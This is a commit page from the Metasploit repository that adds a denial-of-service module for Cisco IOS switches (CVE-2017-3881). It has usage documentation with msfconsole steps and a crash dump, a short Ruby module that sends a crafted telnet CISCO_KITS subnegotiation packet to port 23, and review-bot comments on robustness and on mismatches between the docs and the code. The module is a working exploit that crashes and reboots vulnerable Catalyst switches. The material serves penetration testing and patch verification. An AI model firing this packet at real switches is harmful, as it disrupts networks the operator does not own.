
Commit 40f0d36

Author: Brent Cook (committed)
Land rapid7#8615, add @artkond's DoS module for Cisco CVE-2017-3881
2 parents 819d810 + 0d9f57a commit 40f0d36


2 files changed: +212, -0 lines changed

Lines changed: 161 additions & 0 deletions
@@ -0,0 +1,161 @@
1+
## Vulnerable Application
2+
3+
1. Obtain or target two paired Cisco Catalyst switches of any model indicated here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp.
4+
2. They will need to be configured in cluster mode. Additional information on setup is available from the module author's site here: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
5+
6+
## Verification Steps
7+
8+
1. Start msfconsole
9+
2. Do: `use auxiliary/dos/cisco/ios_telnet_rocem`
10+
3. Do: `set RHOST 192.168.1.10`
11+
4. Do: ```run```
12+
5. The switch should restart and display crash information on the console.
13+
14+
## Scenarios
15+
16+
```
17+
Switch#sh ver
18+
*Mar 1 01:28:01.802: %SYS-5-CONFIG_I: Configured from console by console
19+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
20+
Technical Support: http://www.cisco.com/techsupport
21+
Copyright (c) 1986-2010 by Cisco Systems, Inc.
22+
Compiled Wed 21-Apr-10 04:49 by prod_rel_team
23+
Image text-base: 0x01000000, data-base: 0x02C00000
24+
ROM: Bootstrap program is C3750 boot loader
25+
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
26+
Switch uptime is 1 hour, 28 minutes
27+
System returned to ROM by power-on
28+
System image file is "flash:/c3750-ipbasek9-mz.122-53.SE2/c3750-ipbasek9-mz.122-53.SE2.bin"
29+
[...]
30+
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
31+
Processor board ID CAT1017Z2Z2
32+
Last reset from power-on
33+
1 Virtual Ethernet interface
34+
48 FastEthernet interfaces
35+
4 Gigabit Ethernet interfaces
36+
The password-recovery mechanism is enabled.
37+
[...]
38+
Cisco IOS Software, C3750 Software (C3750-IPSERVICESK9-M), Version 12.2(55)SE10, RELEASE SOFTWARE (fc2)
39+
Technical Support: http://www.cisco.com/techsupport
40+
Copyright (c) 1986-2015 by Cisco Systems, Inc.
41+
Compiled Wed 11-Feb-15 11:40 by prod_rel_team
42+
Image text-base: 0x01000000, data-base: 0x02F00000
43+
[...]
44+
Election Complete
45+
Switch 2 booting as Master
46+
Waiting for Port download...Complete
47+
[...]
48+
cisco WS-C3750-48TS (PowerPC405) processor (revision M0) with 131072K bytes of memory.
49+
Processor board ID CAT1017Z2Z2
50+
Last reset from power-on
51+
1 Virtual Ethernet interface
52+
48 FastEthernet interfaces
53+
4 Gigabit Ethernet interfaces
54+
The password-recovery mechanism is enabled.
55+
[...]
56+
Switch Ports Model SW Version SW Image
57+
------ ----- ----- ---------- ----------
58+
* 2 52 WS-C3750-48TS 12.2(55)SE10 C3750-IPSERVICESK9-M
59+
[... booted successfully, waiting at a prompt, DoS exploit follows ...]
60+
Switch#
61+
00:37:15 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 400, PC = 41414140
62+
-Traceback= 41414140
63+
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_1
64+
=== Flushing messages (00:37:19 UTC Mon Mar 1 1993) ===
65+
Buffered messages:
66+
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
67+
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
68+
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
69+
00:00:50: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
70+
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
71+
00:00:50: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 has changed to state DOWN
72+
00:00:50: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
73+
00:00:50: %SYS-5-RESTART: System restarted --
74+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
75+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
76+
Compiled Fri 20-Jul-07 01:58 by nachen
77+
00:01:48: %SYS-5-CONFIG_I: Configured from console by console
78+
00:27:53: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
79+
00:27:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
80+
00:28:22: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
81+
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to down
82+
00:30:00: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
83+
00:30:01: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to down
84+
00:32:44: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
85+
00:32:45: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
86+
00:33:13: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
87+
Queued messages:
88+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
89+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
90+
Compiled Fri 20-Jul-07 01:58 by nachen
91+
Instruction Access Exception (0x0400)!
92+
SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
93+
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
94+
CPU Register Context:
95+
Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
96+
LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
97+
R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
98+
R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
99+
R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
100+
R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
101+
R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
102+
R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
103+
R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
104+
R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
105+
Stack trace:
106+
PC = 0x41414140, SP = 0x02DDEE80
107+
Frame 00: SP = 0x41414141 PC = 0x41414141
108+
Switch uptime is 37 minutes, 22 seconds
109+
[... rebooting ... ]
110+
Switch Ports Model SW Version SW Image
111+
------ ----- ----- ---------- ----------
112+
* 1 52 WS-C3750-48TS 12.2(35)SE5 C3750-IPBASEK9-M
113+
Failed to generate persistent self-signed certificate.
114+
Secure server will use temporary self-signed certificate.
115+
Press RETURN to get started!
116+
00:00:26: %STACKMGR-4-SWITCH_ADDED: Switch 1 has been ADDED to the stack
117+
00:00:27: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
118+
00:00:29: %SPANTREE-5-EXTENDED_SYSID: Extended SysId enabled for type vlan
119+
00:00:31: %SYS-5-CONFIG_I: Configured from memory by console
120+
00:00:31: %STACKMGR-5-SWITCH_READY: Switch 1 is READY
121+
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 1 Switch 1 has changed to state DOWN
122+
00:00:31: %STACKMGR-4-STACK_LINK_CHANGE: Stack Port 2 Switch 1 h
123+
Switch>
124+
Switch>as changed to state DOWN
125+
00:00:32: %STACKMGR-5-MASTER_READY: Master Switch 1 is READY
126+
00:00:32: %SYS-5-RESTART: System restarted --
127+
Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
128+
Copyright (c) 1986-2007 by Cisco Systems, Inc.
129+
Compiled Fri 20-Jul-07 01:58 by nachen
130+
00:00:33: %LINK-3-UPDOWN: Interface FastEthernet1/0/1, changed state to up
131+
00:00:34: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/0/1, changed state to up
132+
Switch>
133+
Switch>
134+
00:01:04: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
135+
00:01:32: %PLATFORM-1-CRASHED: System previously crashed with the following message:
136+
00:01:32: %PLATFORM-1-CRASHED: Cisco IOS Software, C3750 Software (C3750-IPBASEK9-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1)
137+
00:01:32: %PLATFORM-1-CRASHED: Copyright (c) 1986-2007 by Cisco Systems, Inc.
138+
00:01:32: %PLATFORM-1-CRASHED: Compiled Fri 20-Jul-07 01:58 by nachen
139+
00:01:32: %PLATFORM-1-CRASHED:
140+
00:01:32: %PLATFORM-1-CRASHED: Instruction Access Exception (0x0400)!
141+
00:01:32: %PLATFORM-1-CRASHED:
142+
00:01:32: %PLATFORM-1-CRASHED: SRR0 = 0x41414140 SRR1 = 0x00029230 SRR2 = 0x00648990 SRR3 = 0x00021200
143+
00:01:32: %PLATFORM-1-CRASHED: ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x8C000000 DBSR = 0x00000000
144+
00:01:32: %PLATFORM-1-CRASHED:
145+
00:01:32: %PLATFORM-1-CRASHED: CPU Register Context:
146+
00:01:32: %PLATFORM-1-CRASHED: Vector = 0x00000400 PC = 0x41414140 MSR = 0x00029230 CR = 0x53000005
147+
00:01:32: %PLATFORM-1-CRASHED: LR = 0x41414141 CTR = 0x0004D860 XER = 0xC0000050
148+
00:01:32: %PLATFORM-1-CRASHED: R0 = 0x41414141 R1 = 0x02DDEE80 R2 = 0x00000000 R3 = 0x0358907C
149+
00:01:32: %PLATFORM-1-CRASHED: R4 = 0x00000001 R5 = 0xFFFFFFFF R6 = 0x0182C1B0 R7 = 0x00000000
150+
00:01:32: %PLATFORM-1-CRASHED: R8 = 0x00000001 R9 = 0x0290C84C R10 = 0x00000031 R11 = 0x00000000
151+
00:01:32: %PLATFORM-1-CRASHED: R12 = 0x00221C89 R13 = 0x00110000 R14 = 0x00BD7284 R15 = 0x00000000
152+
00:01:32: %PLATFORM-1-CRASHED: R16 = 0x00000000 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x00000000
153+
00:01:32: %PLATFORM-1-CRASHED: R20 = 0xFFFFFFFF R21 = 0x00000000 R22 = 0x00000000 R23 = 0x02DDF078
154+
00:01:32: %PLATFORM-1-CRASHED: R24 = 0x00000000 R25 = 0x00000001 R26 = 0x000003FB R27 = 0x00000024
155+
00:01:32: %PLATFORM-1-CRASHED: R28 = 0x41414141 R29 = 0x41414141 R30 = 0x41414141 R31 = 0x41414141
156+
00:01:32: %PLATFORM-1-CRASHED:
157+
00:01:32: %PLATFORM-1-CRASHED: Stack trace:
158+
00:01:32: %PLATFORM-1-CRASHED: PC = 0x41414140, SP = 0x02DDEE80
159+
00:01:32: %PLATFORM-1-CRASHED: Frame 00: SP = 0x41414141 PC = 0x41414141
160+
00:01:32: %PLATFORM-1-CRASHED:
161+
```
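Review bot: step 2 of Vulnerable Application says the two switches must be configured in cluster mode, yet the Verification Steps send one packet to a single `RHOST`; state whether cluster configuration is a precondition for the crash or only part of the lab setup on the linked write-up, so readers know what the documented test actually covered. The Scenarios transcript also mixes three IOS versions (12.2(53)SE2 and 12.2(55)SE10 in the `sh ver` output, then 12.2(35)SE5 in the crash dump and the `%PLATFORM-1-CRASHED` messages) without saying which switch crashed; label each block with the switch and version it was captured from, or trim it to the one that crashed. Style: step 4 wraps `run` in triple backticks where steps 2 and 3 use single backticks.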
Lines changed: 51 additions & 0 deletions
@@ -0,0 +1,51 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
class MetasploitModule < Msf::Auxiliary
7+
include Msf::Exploit::Remote::Tcp
8+
include Msf::Auxiliary::Dos
9+
10+
def initialize(info = {})
11+
super(update_info(info,
12+
'Name' => 'Cisco IOS Telnet Denial of Service',
13+
'Description' => %q{
14+
This module triggers a Denial of Service condition in the Cisco IOS
15+
telnet service affecting multiple Cisco switches. Tested against Cisco
16+
Catalyst 2960 and 3750.
17+
},
18+
'Author' => [ 'Artem Kondratenko' ],
19+
'License' => MSF_LICENSE,
20+
'References' =>
21+
[
22+
['BID', '96960'],
23+
['CVE', '2017-3881'],
24+
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],
25+
['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']
26+
],
27+
'DisclosureDate' => 'Mar 17 2017'))
28+
29+
register_options([ Opt::RPORT(23) ])
30+
end
31+
32+
def run
33+
begin
34+
connect
35+
print_status "Connected to telnet service"
36+
packet = sock.read(200)
37+
if packet.nil?
38+
print_status "Failed to get initial packet from telnet service."
39+
else
40+
print_status "Got initial packet from telnet service: " + packet.inspect
41+
end
42+
print_status "Sending Telnet DoS packet"
43+
sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
44+
disconnect
45+
rescue ::Rex::ConnectionRefused
46+
print_status "Unable to connect to #{rhost}:#{rport}."
47+
rescue ::Errno::ECONNRESET
48+
print_good "DoS packet successful. #{rhost} not responding."
49+
end
50+
end
51+
end
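Review bot: `disconnect` in `run` is never reached when any rescued exception fires, and a `Timeout::Error` or `EOFError` from `sock.read(200)` on a silent or slow service is not rescued at all; move `disconnect` into an `ensure` clause and read with `sock.get_once(-1, timeout)` so the initial read cannot block indefinitely. The `print_good "DoS packet successful. #{rhost} not responding."` branch also looks effectively dead, since `disconnect` runs immediately after `sock.put` and an `ECONNRESET` would have to arrive during the write itself; reporting only that the packet was sent, and leaving confirmation to the console check the documentation describes, would be more honest than a success message the module cannot observe. The payload literal `"\xff\xfa\x24\x00\x03CISCO_KITS\x012:" ... ":1:\xff\xf0"` deserves a comment naming the telnet subnegotiation framing (IAC SB ... IAC SE) and the CMP option it carries, so reviewers can check it against the advisory; note too that the documentation's crash dump shows 0x41414141 in PC/LR/R28-R31, which corresponds to a fixed buffer of 'A' bytes rather than the `Rex::Text.rand_text_alpha(1000)` used here, so the docs and the module disagree on what was sent. Minor style: Metasploit modules use parentheses for `print_status(...)` / `print_good(...)`.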
